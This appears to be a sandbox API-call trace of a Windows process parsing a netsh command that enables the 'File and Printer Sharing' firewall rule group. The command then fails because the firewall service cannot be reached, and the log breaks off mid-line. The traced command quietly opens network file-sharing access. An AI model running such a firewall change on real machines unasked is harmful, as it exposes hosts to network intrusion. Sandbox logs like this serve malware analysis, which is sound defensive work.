[0133.205] GetProcessHeap () returned 0x410000 [0133.205] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e7f8 | out: hHeap=0x410000) returned 1 [0133.205] GetProcessHeap () returned 0x410000 [0133.205] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e7f8 [0133.205] GetProcessHeap () returned 0x410000 [0133.205] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x458a98 [0133.205] wcscpy_s (in: _Destination=0x458a98, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0133.205] GetProcessHeap () returned 0x410000 [0133.206] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0133.206] GetProcessHeap () returned 0x410000 [0133.206] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e858 | out: hHeap=0x410000) returned 1 [0133.206] GetProcessHeap () returned 0x410000 [0133.206] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e858 [0133.206] GetProcessHeap () returned 0x410000 [0133.206] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x457330 [0133.206] wcscpy_s (in: _Destination=0x457330, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0133.206] GetProcessHeap () returned 0x410000 [0133.206] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4572f0 | out: hHeap=0x410000) returned 1 [0133.206] GetProcessHeap () returned 0x410000 [0133.206] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e870 | out: hHeap=0x410000) returned 1 [0133.206] GetProcessHeap () returned 0x410000 [0133.206] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e870 [0133.206] GetProcessHeap () returned 0x410000 [0133.206] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa) returned 0x45e948 [0133.206] wcscpy_s (in: _Destination=0x45e948, _SizeInWords=0x5, _Source="rule" | out: _Destination="rule") returned 0x0 [0133.206] GetProcessHeap () returned 0x410000 [0133.206] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e8a0 | out: hHeap=0x410000) returned 1 [0133.206] GetProcessHeap () returned 0x410000 [0133.206] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e888 | out: hHeap=0x410000) returned 1 [0133.206] GetProcessHeap () returned 0x410000 [0133.206] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e888 [0133.206] GetProcessHeap () returned 0x410000 [0133.206] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x42) returned 0x449760 [0133.206] wcscpy_s (in: _Destination=0x449760, _SizeInWords=0x21, _Source="\"group=File and Printer Sharing\"" | out: _Destination="\"group=File and Printer Sharing\"") returned 0x0 [0133.206] GetProcessHeap () returned 0x410000 [0133.206] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449710 | out: hHeap=0x410000) returned 1 [0133.206] GetProcessHeap () returned 0x410000 [0133.206] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e8b8 | out: hHeap=0x410000) returned 1 [0133.206] GetProcessHeap () returned 0x410000 [0133.206] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e8b8 [0133.206] GetProcessHeap () returned 0x410000 [0133.207] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4572f0 [0133.207] wcscpy_s (in: _Destination=0x4572f0, _SizeInWords=0x4, _Source="new" | out: _Destination="new") returned 0x0 [0133.207] GetProcessHeap () returned 0x410000 [0133.207] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457300 | out: hHeap=0x410000) returned 1 [0133.207] GetProcessHeap () returned 0x410000 [0133.207] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e8d0 | out: hHeap=0x410000) returned 1 [0133.207] GetProcessHeap () returned 0x410000 [0133.207] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e8d0 [0133.207] GetProcessHeap () returned 0x410000 [0133.207] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe) returned 0x45e8a0 [0133.207] wcscpy_s (in: _Destination=0x45e8a0, _SizeInWords=0x7, _Source="enable" | out: _Destination="enable") returned 0x0 [0133.207] GetProcessHeap () returned 0x410000 [0133.207] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e900 | out: hHeap=0x410000) returned 1 [0133.207] GetProcessHeap () returned 0x410000 [0133.207] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e8e8 | out: hHeap=0x410000) returned 1 [0133.207] GetProcessHeap () returned 0x410000 [0133.207] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e8e8 [0133.207] GetProcessHeap () returned 0x410000 [0133.207] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4) returned 0x457300 [0133.207] wcscpy_s (in: _Destination=0x457300, _SizeInWords=0x2, _Source="=" | out: _Destination="=") returned 0x0 [0133.207] GetProcessHeap () returned 0x410000 [0133.207] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457310 | out: hHeap=0x410000) returned 1 [0133.207] GetProcessHeap () returned 0x410000 [0133.207] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e918 | out: hHeap=0x410000) returned 1 [0133.207] GetProcessHeap () returned 0x410000 [0133.207] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e918 [0133.207] GetProcessHeap () returned 0x410000 [0133.207] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x457310 [0133.207] wcscpy_s (in: _Destination=0x457310, _SizeInWords=0x4, _Source="Yes" | out: _Destination="Yes") returned 0x0 [0133.207] GetProcessHeap () returned 0x410000 [0133.207] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457320 | out: hHeap=0x410000) returned 1 [0133.207] GetProcessHeap () returned 0x410000 [0133.207] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e930 | out: hHeap=0x410000) returned 1 [0133.207] GetProcessHeap () returned 0x410000 [0133.208] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x45de90 [0133.208] GetProcessHeap () returned 0x410000 [0133.208] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e930 [0133.208] GetProcessHeap () returned 0x410000 [0133.208] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x458a78 [0133.208] GetProcessHeap () returned 0x410000 [0133.208] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x458ab8 [0133.208] GetProcessHeap () returned 0x410000 [0133.208] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x457320 [0133.208] GetProcessHeap () returned 0x410000 [0133.208] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa) returned 0x45e900 [0133.208] GetProcessHeap () returned 0x410000 [0133.208] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x43f130 [0133.208] GetProcessHeap () returned 0x410000 [0133.208] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x457340 [0133.208] GetProcessHeap () returned 0x410000 [0133.208] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe) returned 0x45e960 [0133.208] GetProcessHeap () returned 0x410000 [0133.208] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x45e960, Size=0x10) returned 0x45e978 [0133.208] GetProcessHeap () returned 0x410000 [0133.208] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x45e978, Size=0x16) returned 0x458ad8 [0133.208] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x45e978, Size=0xe) returned 0x45e960 [0133.208] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x45e960, Size=0x24) returned 0x45dec0 [0133.208] GetProcessHeap () returned 0x410000 [0133.208] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x45dec0, Size=0x26) returned 0x45def0 [0133.208] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x45def0, Size=0x36) returned 0x4547d8 [0133.208] GetProcessHeap () returned 0x410000 [0133.208] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4547d8, Size=0x38) returned 0x454818 [0133.208] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x454818, Size=0x3e) returned 0x43f178 [0133.209] GetProcessHeap () returned 0x410000 [0133.209] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x43f178, Size=0x40) returned 0x43f1c0 [0133.209] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x43f1c0, Size=0x48) returned 0x449710 [0133.209] GetProcessHeap () returned 0x410000 [0133.209] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x449710, Size=0x4a) returned 0x45cf48 [0133.209] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x45cf48, Size=0x4c) returned 0x45cfa0 [0133.209] GetProcessHeap () returned 0x410000 [0133.209] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x45cfa0, Size=0x88) returned 0x46dce0 [0133.209] GetProcessHeap () returned 0x410000 [0133.209] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x46dce0, Size=0x8a) returned 0x46dce0 [0133.209] GetProcessHeap () returned 0x410000 [0133.209] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x46dce0, Size=0x8c) returned 0x46dce0 [0133.209] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x46dce0, Size=0x92) returned 0x46dce0 [0133.209] GetProcessHeap () returned 0x410000 [0133.209] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x46dce0, Size=0x94) returned 0x46dce0 [0133.209] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x46dce0, Size=0xa8) returned 0x46dce0 [0133.209] GetProcessHeap () returned 0x410000 [0133.209] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46dce0 | out: hHeap=0x410000) returned 1 [0133.209] _wcsnicmp (_String1="advfirewall", _String2="dump", _MaxCount=0xb) returned -3 [0133.209] _wcsnicmp (_String1="advfirewall", _String2="help", _MaxCount=0xb) returned -7 [0133.210] _wcsnicmp (_String1="advfirewall", _String2="?", _MaxCount=0xb) returned 34 [0133.210] _wcsnicmp (_String1="advfirewall", _String2="exec", _MaxCount=0xb) returned -4 [0133.210] _wcsnicmp (_String1="advfirewall", _String2="advfirewall", _MaxCount=0xb) returned 0 [0133.210] GetProcessHeap () returned 0x410000 [0133.210] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e960 [0133.210] GetProcessHeap () returned 0x410000 [0133.210] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e978 [0133.210] GetProcessHeap () returned 0x410000 [0133.210] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa8) returned 0x46dce0 [0133.210] GetProcessHeap () returned 0x410000 [0133.210] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e990 [0133.210] GetProcessHeap () returned 0x410000 [0133.210] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e9a8 [0133.210] wcscpy_s (in: _Destination=0x45e9a8, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0133.210] GetProcessHeap () returned 0x410000 [0133.210] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e9c0 [0133.210] GetProcessHeap () returned 0x410000 [0133.210] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x458af8 [0133.210] wcscpy_s (in: _Destination=0x458af8, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0133.210] GetProcessHeap () returned 0x410000 [0133.210] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e9d8 [0133.210] GetProcessHeap () returned 0x410000 [0133.210] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x458b18 [0133.210] wcscpy_s (in: _Destination=0x458b18, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0133.210] GetProcessHeap () returned 0x410000 [0133.210] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e9f0 [0133.210] GetProcessHeap () returned 0x410000 [0133.210] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x457350 [0133.210] wcscpy_s (in: _Destination=0x457350, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0133.210] GetProcessHeap () returned 0x410000 [0133.210] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45ea08 [0133.210] GetProcessHeap () returned 0x410000 [0133.210] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa) returned 0x45ea20 [0133.211] wcscpy_s (in: _Destination=0x45ea20, _SizeInWords=0x5, _Source="rule" | out: _Destination="rule") returned 0x0 [0133.211] GetProcessHeap () returned 0x410000 [0133.211] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45ea38 [0133.211] GetProcessHeap () returned 0x410000 [0133.211] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x42) returned 0x449710 [0133.211] wcscpy_s (in: _Destination=0x449710, _SizeInWords=0x21, _Source="\"group=File and Printer Sharing\"" | out: _Destination="\"group=File and Printer Sharing\"") returned 0x0 [0133.211] GetProcessHeap () returned 0x410000 [0133.211] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45ea50 [0133.211] GetProcessHeap () returned 0x410000 [0133.211] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x457360 [0133.211] wcscpy_s (in: _Destination=0x457360, _SizeInWords=0x4, _Source="new" | out: _Destination="new") returned 0x0 [0133.211] GetProcessHeap () returned 0x410000 [0133.211] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45ea68 [0133.211] GetProcessHeap () returned 0x410000 [0133.211] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe) returned 0x45ea80 [0133.211] wcscpy_s (in: _Destination=0x45ea80, _SizeInWords=0x7, _Source="enable" | out: _Destination="enable") returned 0x0 [0133.211] GetProcessHeap () returned 0x410000 [0133.211] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45ea98 [0133.211] GetProcessHeap () returned 0x410000 [0133.211] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4) returned 0x457370 [0133.211] wcscpy_s (in: _Destination=0x457370, _SizeInWords=0x2, _Source="=" | out: _Destination="=") returned 0x0 [0133.211] GetProcessHeap () returned 0x410000 [0133.211] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x46dda8 [0133.212] GetProcessHeap () returned 0x410000 [0133.212] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x457380 [0133.212] wcscpy_s (in: _Destination=0x457380, _SizeInWords=0x4, _Source="Yes" | out: _Destination="Yes") returned 0x0 [0133.212] GetProcessHeap () returned 0x410000 [0133.212] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46dce0 | out: hHeap=0x410000) returned 1 [0133.212] GetProcessHeap () returned 0x410000 [0133.212] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45e978 | out: hHeap=0x410000) returned 1 [0133.212] GetProcessHeap () returned 0x410000 [0133.212] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458af8 | out: hHeap=0x410000) returned 1 [0133.212] GetProcessHeap () returned 0x410000 [0133.212] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x458af8 [0133.212] _wcsnicmp (_String1="firewall", _String2="dump", _MaxCount=0x8) returned 2 [0133.212] _wcsnicmp (_String1="firewall", _String2="help", _MaxCount=0x8) returned -2 [0133.212] _wcsnicmp (_String1="firewall", _String2="?", _MaxCount=0x8) returned 39 [0133.212] _wcsnicmp (_String1="firewall", _String2="reset", _MaxCount=0x8) returned -12 [0133.212] _wcsnicmp (_String1="firewall", _String2="import", _MaxCount=0x8) returned -3 [0133.212] _wcsnicmp (_String1="firewall", _String2="export", _MaxCount=0x8) returned 1 [0133.212] _wcsnicmp (_String1="firewall", _String2="consec", _MaxCount=0x8) returned 3 [0133.212] _wcsnicmp (_String1="firewall", _String2="firewall", _MaxCount=0x8) returned 0 [0133.212] GetProcessHeap () returned 0x410000 [0133.212] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x45e978 [0133.212] GetProcessHeap () returned 0x410000 [0133.212] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x46ddc0 [0133.212] GetProcessHeap () returned 0x410000 [0133.212] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x46aad8 [0133.212] GetProcessHeap () returned 0x410000 [0133.212] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x46ddd8 [0133.212] GetProcessHeap () returned 0x410000 [0133.212] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x46ddf0 [0133.213] wcscpy_s (in: _Destination=0x46ddf0, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0133.213] GetProcessHeap () returned 0x410000 [0133.213] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x46de08 [0133.213] GetProcessHeap () returned 0x410000 [0133.213] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x458b38 [0133.213] wcscpy_s (in: _Destination=0x458b38, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0133.213] GetProcessHeap () returned 0x410000 [0133.213] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x46de20 [0133.213] GetProcessHeap () returned 0x410000 [0133.213] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x458b58 [0133.213] wcscpy_s (in: _Destination=0x458b58, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0133.213] GetProcessHeap () returned 0x410000 [0133.213] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x46de38 [0133.213] GetProcessHeap () returned 0x410000 [0133.213] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x457390 [0133.213] wcscpy_s (in: _Destination=0x457390, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0133.213] GetProcessHeap () returned 0x410000 [0133.213] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x46de50 [0133.213] GetProcessHeap () returned 0x410000 [0133.213] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa) returned 0x46de68 [0133.213] wcscpy_s (in: _Destination=0x46de68, _SizeInWords=0x5, _Source="rule" | out: _Destination="rule") returned 0x0 [0133.213] GetProcessHeap () returned 0x410000 [0133.213] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x46de80 [0133.213] GetProcessHeap () returned 0x410000 [0133.213] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x42) returned 0x4497b0 [0133.213] wcscpy_s (in: _Destination=0x4497b0, _SizeInWords=0x21, _Source="\"group=File and Printer Sharing\"" | out: _Destination="\"group=File and Printer Sharing\"") returned 0x0 [0133.213] GetProcessHeap () returned 0x410000 [0133.213] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x46de98 [0133.213] GetProcessHeap () returned 0x410000 [0133.213] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4573a0 [0133.213] wcscpy_s (in: _Destination=0x4573a0, _SizeInWords=0x4, _Source="new" | out: _Destination="new") returned 0x0 [0133.213] GetProcessHeap () returned 0x410000 [0133.213] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x46deb0 [0133.213] GetProcessHeap () returned 0x410000 [0133.214] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe) returned 0x46dec8 [0133.214] wcscpy_s (in: _Destination=0x46dec8, _SizeInWords=0x7, _Source="enable" | out: _Destination="enable") returned 0x0 [0133.214] GetProcessHeap () returned 0x410000 [0133.214] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x46dee0 [0133.214] GetProcessHeap () returned 0x410000 [0133.214] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4) returned 0x4573b0 [0133.214] wcscpy_s (in: _Destination=0x4573b0, _SizeInWords=0x2, _Source="=" | out: _Destination="=") returned 0x0 [0133.214] GetProcessHeap () returned 0x410000 [0133.214] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x46def8 [0133.214] GetProcessHeap () returned 0x410000 [0133.214] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4573c0 [0133.214] wcscpy_s (in: _Destination=0x4573c0, _SizeInWords=0x4, _Source="Yes" | out: _Destination="Yes") returned 0x0 [0133.214] GetProcessHeap () returned 0x410000 [0133.214] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46aad8 | out: hHeap=0x410000) returned 1 [0133.214] GetProcessHeap () returned 0x410000 [0133.214] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46ddc0 | out: hHeap=0x410000) returned 1 [0133.214] GetProcessHeap () returned 0x410000 [0133.214] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b58 | out: hHeap=0x410000) returned 1 [0133.214] GetProcessHeap () returned 0x410000 [0133.214] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x458b58 [0133.214] _wcsnicmp (_String1="set", _String2="dum", _MaxCount=0x3) returned 15 [0133.214] _wcsnicmp (_String1="set", _String2="hel", _MaxCount=0x3) returned 11 [0133.214] _wcsnicmp (_String1="set", _String2="?", _MaxCount=0x3) returned 52 [0133.214] _wcsnicmp (_String1="set", _String2="add", _MaxCount=0x3) returned 18 [0133.214] _wcsnicmp (_String1="set", _String2="del", _MaxCount=0x3) returned 15 [0133.214] _wcsnicmp (_String1="set", _String2="set", _MaxCount=0x3) returned 0 [0133.214] _wcsnicmp (_String1="rule", _String2="help", _MaxCount=0x4) returned 10 [0133.214] _wcsnicmp (_String1="rule", _String2="?", _MaxCount=0x4) returned 51 [0133.214] wcstok (in: _String="rule", _Delimiter=" ", _Context=0x0 | out: _String="rule", _Context=0x0) returned="rule" [0133.214] _wcsnicmp (_String1="rule", _String2="rule", _MaxCount=0x4) returned 0 [0133.214] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned 0x0 [0133.216] MatchTagsInCmdLine () returned 0x0 [0133.216] wcspbrk (_String="group=File and Printer Sharing", _Control="=") returned="=File and Printer Sharing" [0133.216] GetProcessHeap () returned 0x410000 [0133.216] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3e) returned 0x43f1c0 [0133.216] wcscpy_s (in: _Destination=0x43f1c0, _SizeInWords=0x1f, _Source="group=File and Printer Sharing" | out: _Destination="group=File and Printer Sharing") returned 0x0 [0133.216] wcstok (in: _String="group=File and Printer Sharing", _Delimiter="=", _Context=0x43f1c0 | out: _String="group", _Context=0x43f1c0) returned="group" [0133.216] _wcsnicmp (_String1="group", _String2="Name", _MaxCount=0x5) returned -7 [0133.216] _wcsnicmp (_String1="group", _String2="Direc", _MaxCount=0x5) returned 3 [0133.216] _wcsnicmp (_String1="group", _String2="Profi", _MaxCount=0x5) returned -9 [0133.216] _wcsnicmp (_String1="group", _String2="Local", _MaxCount=0x5) returned -5 [0133.216] _wcsnicmp (_String1="group", _String2="Remot", _MaxCount=0x5) returned -11 [0133.216] _wcsnicmp (_String1="group", _String2="Local", _MaxCount=0x5) returned -5 [0133.216] _wcsnicmp (_String1="group", _String2="Remot", _MaxCount=0x5) returned -11 [0133.216] _wcsnicmp (_String1="group", _String2="Progr", _MaxCount=0x5) returned -9 [0133.216] _wcsnicmp (_String1="group", _String2="Proto", _MaxCount=0x5) returned -9 [0133.216] _wcsnicmp (_String1="group", _String2="Servi", _MaxCount=0x5) returned -12 [0133.216] _wcsnicmp (_String1="group", _String2="Group", _MaxCount=0x5) returned 0 [0133.216] wcscpy_s (in: _Destination=0x43f130, _SizeInWords=0x1f, _Source="File and Printer Sharing" | out: _Destination="File and Printer Sharing") returned 0x0 [0133.216] GetProcessHeap () returned 0x410000 [0133.216] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f1c0 | out: hHeap=0x410000) returned 1 [0133.513] LoadStringW (in: hInstance=0x71890000, uID=0x200032cb, lpBuffer=0x3d3140, cchBufferMax=8192 | out: lpBuffer="\nAn error occurred while attempting to contact the Windows Firewall service. Make sure that the service is running and try your request again.\n") returned 0x90 [0133.519] FormatMessageW (in: dwFlags=0x500, lpSource=0x3d3140, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x3d313c, nSize=0x0, Arguments=0x3d3138 | out: lpBuffer="F\nAn error occurred while attempting to contact the Windows Firewall service. Make sure that the service is running and try your request again.\n") returned 0x92 [0133.519] GetStdHandle (nStdHandle=0xfffffff5) returned 0x32c [0133.519] GetConsoleOutputCP () returned 0x1b5 [0133.520] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\nAn error occurred while attempting to contact the Windows Firewall service. Make sure that the service is running and try your request again.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 147 [0133.520] GetProcessHeap () returned 0x410000 [0133.520] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x93) returned 0x46aed8 [0133.521] GetConsoleOutputCP () returned 0x1b5 [0133.525] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\nAn error occurred while attempting to contact the Windows Firewall service. Make sure that the service is running and try your request again.\r\n", cchWideChar=-1, lpMultiByteStr=0x46aed8, cbMultiByte=147, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nAn error occurred while attempting to contact the Windows Firewall service. Make sure that the service is running and try your request again.\r\n", lpUsedDefaultChar=0x0) returned 147 [0133.526] WriteFile (in: hFile=0x32c, lpBuffer=0x46aed8, nNumberOfBytesToWrite=0x92, lpNumberOfBytesWritten=0x3d310c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x3d310c, lpOverlapped=0x0) returned 0 [0133.526] GetProcessHeap () returned 0x410000 [0133.526] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46aed8 | out: hHeap=0x410000) returned 1 [0133.526] LocalFree (hMem=0x46e590) returned 0x0 [0133.526] FormatMessageW (in: dwFlags=0x500, lpSource=0x15f2008, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x3d7674, nSize=0x0, Arguments=0x3d7688 | out: lpBuffer="?F皌=㚪ş ş皈=皘=皘=㙻ş ş盠=ダş") returned 0x2 [0133.526] GetStdHandle (nStdHandle=0xfffffff5) returned 0x32c [0133.526] GetConsoleOutputCP () returned 0x1b5 [0133.526] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0133.526] GetProcessHeap () returned 0x410000 [0133.526] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3) returned 0x46aaf0 [0133.526] GetConsoleOutputCP () returned 0x1b5 [0133.526] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x46aaf0, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0133.526] WriteFile (in: hFile=0x32c, lpBuffer=0x46aaf0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x3d7650, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x3d7650, lpOverlapped=0x0) returned 0 [0133.526] GetProcessHeap () returned 0x410000 [0133.526] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46aaf0 | out: hHeap=0x410000) returned 1 [0133.526] LocalFree 